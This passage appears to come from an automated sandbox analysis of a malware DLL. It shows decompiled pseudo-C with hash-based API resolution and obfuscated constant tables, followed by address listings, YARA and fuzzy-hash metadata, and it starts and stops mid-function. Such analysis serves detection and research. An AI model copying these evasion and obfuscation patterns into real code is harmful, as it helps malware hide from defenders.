				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v116, E6E9AF4CC(_t341) + 0x10);
				E6E9AF4BC( &_v120, E6E9AF4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v124, E6E9AF4CC(_t345) + 0x10);
				E6E9AF4BC( &_v128, E6E9AF4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v132, E6E9AF4CC(_t349) + 0x10);
				E6E9AF4BC( &_v136, E6E9AF4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v140, E6E9AF4CC(_t353) + 0x10);
				E6E9AF4BC( &_v144, E6E9AF4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v148, E6E9AF4CC(_t357) + 0x10);
				E6E9AF4BC( &_v152, E6E9AF4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v156, E6E9AF4CC(_t361) + 0x10);
				E6E9AF4BC( &_v160, E6E9AF4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v164, E6E9AF4CC(_t365) + 0x10);
				E6E9AF4BC( &_v168, E6E9AF4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v172, E6E9AF4CC(_t369) + 0x10);
				E6E9AF4BC( &_v176, E6E9AF4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v180, E6E9AF4CC(_t373) + 0x10);
				E6E9AF4BC( &_v184, E6E9AF4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v188, E6E9AF4CC(_t377) + 0x10);
				E6E9AF4BC( &_v192, E6E9AF4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v196, E6E9AF4CC(_t381) + 0x10);
				E6E9AF4BC( &_v200, E6E9AF4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v204, E6E9AF4CC(_t385) + 0x10);
				E6E9AF4BC( &_v208, E6E9AF4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6E9B4200(0x60a28c5c, _t434);
				E6E9AF4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E9AF4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E9AF4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E9AF4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E9AF4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E9AF4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E9AF4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E9AF4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E9AF4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E9AF4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E9AF4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E9AF4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E9AF4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E9AF4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6E9AF4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E9AF4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E9AF4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E9A1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E9AB27C( &_v248, _v256, _t481, _v252, _t318);
				E6E9AF840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v296, E6E9AF4CC(_t410) + 0x10);
				E6E9AF4BC( &_v300, E6E9AF4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v304, E6E9AF4CC(_t414) + 0x10);
				E6E9AF4BC( &_v308, E6E9AF4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v312, E6E9AF4CC(_t418) + 0x10);
				E6E9AF4BC( &_v316, E6E9AF4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v320, E6E9AF4CC(_t422) + 0x10);
				E6E9AF4BC( &_v324, E6E9AF4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E9AB9FC(_t154,  *_t480);
				E6E9AF4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6E9AF4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E9AF4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E9AF4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E9AF654( &_v316);
				return E6E9AF654( &_v356);
			}
















































































                                                                                                                                                  0x6e9a1494
                                                                                                                                                  0x6e9a1498
                                                                                                                                                  0x6e9a149d
                                                                                                                                                  0x6e9a14a3
                                                                                                                                                  0x6e9a14ab
                                                                                                                                                  0x6e9a14b0
                                                                                                                                                  0x6e9a14bc
                                                                                                                                                  0x6e9a14c0
                                                                                                                                                  0x6e9a14d2
                                                                                                                                                  0x6e9a14e8
                                                                                                                                                  0x6e9a14f3
                                                                                                                                                  0x6e9a14f4
                                                                                                                                                  0x6e9a14f5
                                                                                                                                                  0x6e9a14f6
                                                                                                                                                  0x6e9a14f7
                                                                                                                                                  0x6e9a14fa
                                                                                                                                                  0x6e9a14fe
                                                                                                                                                  0x6e9a1502
                                                                                                                                                  0x6e9a1509
                                                                                                                                                  0x6e9a151b
                                                                                                                                                  0x6e9a1531
                                                                                                                                                  0x6e9a153c
                                                                                                                                                  0x6e9a153d
                                                                                                                                                  0x6e9a153e
                                                                                                                                                  0x6e9a153f
                                                                                                                                                  0x6e9a1540
                                                                                                                                                  0x6e9a1543
                                                                                                                                                  0x6e9a1547
                                                                                                                                                  0x6e9a154b
                                                                                                                                                  0x6e9a1552
                                                                                                                                                  0x6e9a1564
                                                                                                                                                  0x6e9a157a
                                                                                                                                                  0x6e9a1585
                                                                                                                                                  0x6e9a1586
                                                                                                                                                  0x6e9a1587
                                                                                                                                                  0x6e9a1588
                                                                                                                                                  0x6e9a1589
                                                                                                                                                  0x6e9a158c
                                                                                                                                                  0x6e9a1590
                                                                                                                                                  0x6e9a1594
                                                                                                                                                  0x6e9a159b
                                                                                                                                                  0x6e9a15ad
                                                                                                                                                  0x6e9a15c3
                                                                                                                                                  0x6e9a15ce
                                                                                                                                                  0x6e9a15cf
                                                                                                                                                  0x6e9a15d0
                                                                                                                                                  0x6e9a15d1
                                                                                                                                                  0x6e9a15d2
                                                                                                                                                  0x6e9a15d5
                                                                                                                                                  0x6e9a15d9
                                                                                                                                                  0x6e9a15dd
                                                                                                                                                  0x6e9a15e4
                                                                                                                                                  0x6e9a15f6
                                                                                                                                                  0x6e9a160c
                                                                                                                                                  0x6e9a1617
                                                                                                                                                  0x6e9a1618
                                                                                                                                                  0x6e9a1619
                                                                                                                                                  0x6e9a161a
                                                                                                                                                  0x6e9a161b
                                                                                                                                                  0x6e9a161e
                                                                                                                                                  0x6e9a1622
                                                                                                                                                  0x6e9a1626
                                                                                                                                                  0x6e9a162d
                                                                                                                                                  0x6e9a163f
                                                                                                                                                  0x6e9a1655
                                                                                                                                                  0x6e9a1660
                                                                                                                                                  0x6e9a1661
                                                                                                                                                  0x6e9a1662
                                                                                                                                                  0x6e9a1663
                                                                                                                                                  0x6e9a1664
                                                                                                                                                  0x6e9a1667
                                                                                                                                                  0x6e9a166b
                                                                                                                                                  0x6e9a166f
                                                                                                                                                  0x6e9a1676
                                                                                                                                                  0x6e9a1688
                                                                                                                                                  0x6e9a169e
                                                                                                                                                  0x6e9a16a9
                                                                                                                                                  0x6e9a16aa
                                                                                                                                                  0x6e9a16ab
                                                                                                                                                  0x6e9a16ac
                                                                                                                                                  0x6e9a16ad
                                                                                                                                                  0x6e9a16b0
                                                                                                                                                  0x6e9a16b4
                                                                                                                                                  0x6e9a16b8
                                                                                                                                                  0x6e9a16bf
                                                                                                                                                  0x6e9a16d1
                                                                                                                                                  0x6e9a16e7
                                                                                                                                                  0x6e9a16f2
                                                                                                                                                  0x6e9a16f3
                                                                                                                                                  0x6e9a16f4
                                                                                                                                                  0x6e9a16f5
                                                                                                                                                  0x6e9a16f6
                                                                                                                                                  0x6e9a16f9
                                                                                                                                                  0x6e9a16fd
                                                                                                                                                  0x6e9a1701
                                                                                                                                                  0x6e9a1708
                                                                                                                                                  0x6e9a171a
                                                                                                                                                  0x6e9a1730
                                                                                                                                                  0x6e9a173b
                                                                                                                                                  0x6e9a173c
                                                                                                                                                  0x6e9a173d
                                                                                                                                                  0x6e9a173e
                                                                                                                                                  0x6e9a173f
                                                                                                                                                  0x6e9a1742
                                                                                                                                                  0x6e9a1746
                                                                                                                                                  0x6e9a174a
                                                                                                                                                  0x6e9a1751
                                                                                                                                                  0x6e9a1763
                                                                                                                                                  0x6e9a1779
                                                                                                                                                  0x6e9a1784
                                                                                                                                                  0x6e9a1785
                                                                                                                                                  0x6e9a1786
                                                                                                                                                  0x6e9a1787
                                                                                                                                                  0x6e9a1788
                                                                                                                                                  0x6e9a178b
                                                                                                                                                  0x6e9a178f
                                                                                                                                                  0x6e9a1793
                                                                                                                                                  0x6e9a179a
                                                                                                                                                  0x6e9a17ac
                                                                                                                                                  0x6e9a17c2
                                                                                                                                                  0x6e9a17cd
                                                                                                                                                  0x6e9a17ce
                                                                                                                                                  0x6e9a17cf
                                                                                                                                                  0x6e9a17d0
                                                                                                                                                  0x6e9a17d1
                                                                                                                                                  0x6e9a17d4
                                                                                                                                                  0x6e9a17d8
                                                                                                                                                  0x6e9a17dc
                                                                                                                                                  0x6e9a17e3
                                                                                                                                                  0x6e9a17f5
                                                                                                                                                  0x6e9a180b
                                                                                                                                                  0x6e9a1816
                                                                                                                                                  0x6e9a1817
                                                                                                                                                  0x6e9a1818
                                                                                                                                                  0x6e9a1819
                                                                                                                                                  0x6e9a181a
                                                                                                                                                  0x6e9a181d
                                                                                                                                                  0x6e9a1821
                                                                                                                                                  0x6e9a1825
                                                                                                                                                  0x6e9a182c
                                                                                                                                                  0x6e9a183e
                                                                                                                                                  0x6e9a1854
                                                                                                                                                  0x6e9a185f
                                                                                                                                                  0x6e9a1860
                                                                                                                                                  0x6e9a1861
                                                                                                                                                  0x6e9a1862
                                                                                                                                                  0x6e9a1863
                                                                                                                                                  0x6e9a1866
                                                                                                                                                  0x6e9a186a
                                                                                                                                                  0x6e9a186e
                                                                                                                                                  0x6e9a1875
                                                                                                                                                  0x6e9a1887
                                                                                                                                                  0x6e9a189d
                                                                                                                                                  0x6e9a18a8
                                                                                                                                                  0x6e9a18a9
                                                                                                                                                  0x6e9a18aa
                                                                                                                                                  0x6e9a18ab
                                                                                                                                                  0x6e9a18ac
                                                                                                                                                  0x6e9a18af
                                                                                                                                                  0x6e9a18b3
                                                                                                                                                  0x6e9a18b7
                                                                                                                                                  0x6e9a18be
                                                                                                                                                  0x6e9a18d0
                                                                                                                                                  0x6e9a18e6
                                                                                                                                                  0x6e9a18f1
                                                                                                                                                  0x6e9a18f2
                                                                                                                                                  0x6e9a18f3
                                                                                                                                                  0x6e9a18f4
                                                                                                                                                  0x6e9a18f5
                                                                                                                                                  0x6e9a18f8
                                                                                                                                                  0x6e9a18fc
                                                                                                                                                  0x6e9a1900
                                                                                                                                                  0x6e9a1907
                                                                                                                                                  0x6e9a1919
                                                                                                                                                  0x6e9a192f
                                                                                                                                                  0x6e9a193a
                                                                                                                                                  0x6e9a193b
                                                                                                                                                  0x6e9a193c
                                                                                                                                                  0x6e9a193d
                                                                                                                                                  0x6e9a193e
                                                                                                                                                  0x6e9a1941
                                                                                                                                                  0x6e9a1945
                                                                                                                                                  0x6e9a1949
                                                                                                                                                  0x6e9a1950
                                                                                                                                                  0x6e9a1962
                                                                                                                                                  0x6e9a1978
                                                                                                                                                  0x6e9a1983
                                                                                                                                                  0x6e9a1984
                                                                                                                                                  0x6e9a1985
                                                                                                                                                  0x6e9a1986
                                                                                                                                                  0x6e9a198c
                                                                                                                                                  0x6e9a198f
                                                                                                                                                  0x6e9a1991
                                                                                                                                                  0x6e9a199c
                                                                                                                                                  0x6e9a19a3
                                                                                                                                                  0x6e9a19ac
                                                                                                                                                  0x6e9a19b4
                                                                                                                                                  0x6e9a19bb
                                                                                                                                                  0x6e9a19c4
                                                                                                                                                  0x6e9a19cc
                                                                                                                                                  0x6e9a19d3
                                                                                                                                                  0x6e9a19dc
                                                                                                                                                  0x6e9a19e4
                                                                                                                                                  0x6e9a19eb
                                                                                                                                                  0x6e9a19f4
                                                                                                                                                  0x6e9a19fc
                                                                                                                                                  0x6e9a1a03
                                                                                                                                                  0x6e9a1a0c
                                                                                                                                                  0x6e9a1a14
                                                                                                                                                  0x6e9a1a1b
                                                                                                                                                  0x6e9a1a24
                                                                                                                                                  0x6e9a1a2c
                                                                                                                                                  0x6e9a1a36
                                                                                                                                                  0x6e9a1a3f
                                                                                                                                                  0x6e9a1a47
                                                                                                                                                  0x6e9a1a51
                                                                                                                                                  0x6e9a1a5a
                                                                                                                                                  0x6e9a1a62
                                                                                                                                                  0x6e9a1a6c
                                                                                                                                                  0x6e9a1a75
                                                                                                                                                  0x6e9a1a7d
                                                                                                                                                  0x6e9a1a87
                                                                                                                                                  0x6e9a1a90
                                                                                                                                                  0x6e9a1a98
                                                                                                                                                  0x6e9a1aa2
                                                                                                                                                  0x6e9a1aab
                                                                                                                                                  0x6e9a1ab3
                                                                                                                                                  0x6e9a1abd
                                                                                                                                                  0x6e9a1ac6
                                                                                                                                                  0x6e9a1ace
                                                                                                                                                  0x6e9a1ad8
                                                                                                                                                  0x6e9a1ae1
                                                                                                                                                  0x6e9a1ae9
                                                                                                                                                  0x6e9a1af3
                                                                                                                                                  0x6e9a1afc
                                                                                                                                                  0x6e9a1b04
                                                                                                                                                  0x6e9a1b0e
                                                                                                                                                  0x6e9a1b17
                                                                                                                                                  0x6e9a1b1f
                                                                                                                                                  0x6e9a1b26
                                                                                                                                                  0x6e9a1b2f
                                                                                                                                                  0x6e9a1b37
                                                                                                                                                  0x6e9a1b3e
                                                                                                                                                  0x6e9a1b43
                                                                                                                                                  0x6e9a1b51
                                                                                                                                                  0x6e9a1b55
                                                                                                                                                  0x6e9a1b64
                                                                                                                                                  0x6e9a1b6d
                                                                                                                                                  0x6e9a1b72
                                                                                                                                                  0x6e9a1b79
                                                                                                                                                  0x6e9a1b7d
                                                                                                                                                  0x6e9a1b81
                                                                                                                                                  0x6e9a1b88
                                                                                                                                                  0x6e9a1b9a
                                                                                                                                                  0x6e9a1bb0
                                                                                                                                                  0x6e9a1bbb
                                                                                                                                                  0x6e9a1bbc
                                                                                                                                                  0x6e9a1bbd
                                                                                                                                                  0x6e9a1bbe
                                                                                                                                                  0x6e9a1bbf
                                                                                                                                                  0x6e9a1bc2
                                                                                                                                                  0x6e9a1bc6
                                                                                                                                                  0x6e9a1bca
                                                                                                                                                  0x6e9a1bd1
                                                                                                                                                  0x6e9a1be3
                                                                                                                                                  0x6e9a1bf9
                                                                                                                                                  0x6e9a1c04
                                                                                                                                                  0x6e9a1c05
                                                                                                                                                  0x6e9a1c06
                                                                                                                                                  0x6e9a1c07
                                                                                                                                                  0x6e9a1c08
                                                                                                                                                  0x6e9a1c0b
                                                                                                                                                  0x6e9a1c0f
                                                                                                                                                  0x6e9a1c13
                                                                                                                                                  0x6e9a1c1a
                                                                                                                                                  0x6e9a1c2c
                                                                                                                                                  0x6e9a1c42
                                                                                                                                                  0x6e9a1c4d
                                                                                                                                                  0x6e9a1c4e
                                                                                                                                                  0x6e9a1c4f
                                                                                                                                                  0x6e9a1c50
                                                                                                                                                  0x6e9a1c51
                                                                                                                                                  0x6e9a1c54
                                                                                                                                                  0x6e9a1c58
                                                                                                                                                  0x6e9a1c5c
                                                                                                                                                  0x6e9a1c63
                                                                                                                                                  0x6e9a1c75
                                                                                                                                                  0x6e9a1c8b
                                                                                                                                                  0x6e9a1c96
                                                                                                                                                  0x6e9a1c97
                                                                                                                                                  0x6e9a1c98
                                                                                                                                                  0x6e9a1c99
                                                                                                                                                  0x6e9a1c9a
                                                                                                                                                  0x6e9a1c9d
                                                                                                                                                  0x6e9a1ca0
                                                                                                                                                  0x6e9a1ca1
                                                                                                                                                  0x6e9a1ca2
                                                                                                                                                  0x6e9a1ca9
                                                                                                                                                  0x6e9a1cac
                                                                                                                                                  0x6e9a1cb7
                                                                                                                                                  0x6e9a1cbe
                                                                                                                                                  0x6e9a1cc7
                                                                                                                                                  0x6e9a1ccf
                                                                                                                                                  0x6e9a1cd6
                                                                                                                                                  0x6e9a1cdf
                                                                                                                                                  0x6e9a1ce7
                                                                                                                                                  0x6e9a1cee
                                                                                                                                                  0x6e9a1cf7
                                                                                                                                                  0x6e9a1cff
                                                                                                                                                  0x6e9a1d04
                                                                                                                                                  0x6e9a1d0d
                                                                                                                                                  0x6e9a1d15
                                                                                                                                                  0x6e9a1d2a

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8nsK
                                                                                                                                                  • API String ID: 0-3012451157
                                                                                                                                                  • Opcode ID: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
                                                                                                                                                  • Instruction ID: dc89d609a182f1c296e234adc6751ae1f7d7829cec6b6c2ca26cc32caf8bb332
                                                                                                                                                  • Opcode Fuzzy Hash: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
                                                                                                                                                  • Instruction Fuzzy Hash: C232A7724087069AC715DF64C8549EF77A4AFF120CF204F1DB6895A2A2FF71E986CB81
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9AA4E8, Relevance: 1.8, Strings: 1, Instructions: 537COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E6E9AA4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E9AB658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E9AF4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E9AF654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6E9B2234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E9AF654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E9AF584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E9AF584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6e9bb808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6E9B3064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E9AF4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E9AB5C4(_t439 + 0x34);
											E6E9AB5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6E9AB5C4(_t439 + 0x34);
										E6E9AB5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6E9AF4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E9ACA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E9AC280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E9AF828(_t439 + 0x14, E6E9AF4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E9AF4BC(_t439 + 0x14, E6E9AF4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6E9B3064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E9AF828(_t439 + 0x40, E6E9AF4CC(_t439 + 0x3c) + 4);
											 *(E6E9AF4BC(_t439 + 0x40, E6E9AF4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E9ACD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E9AF4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E9AF4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
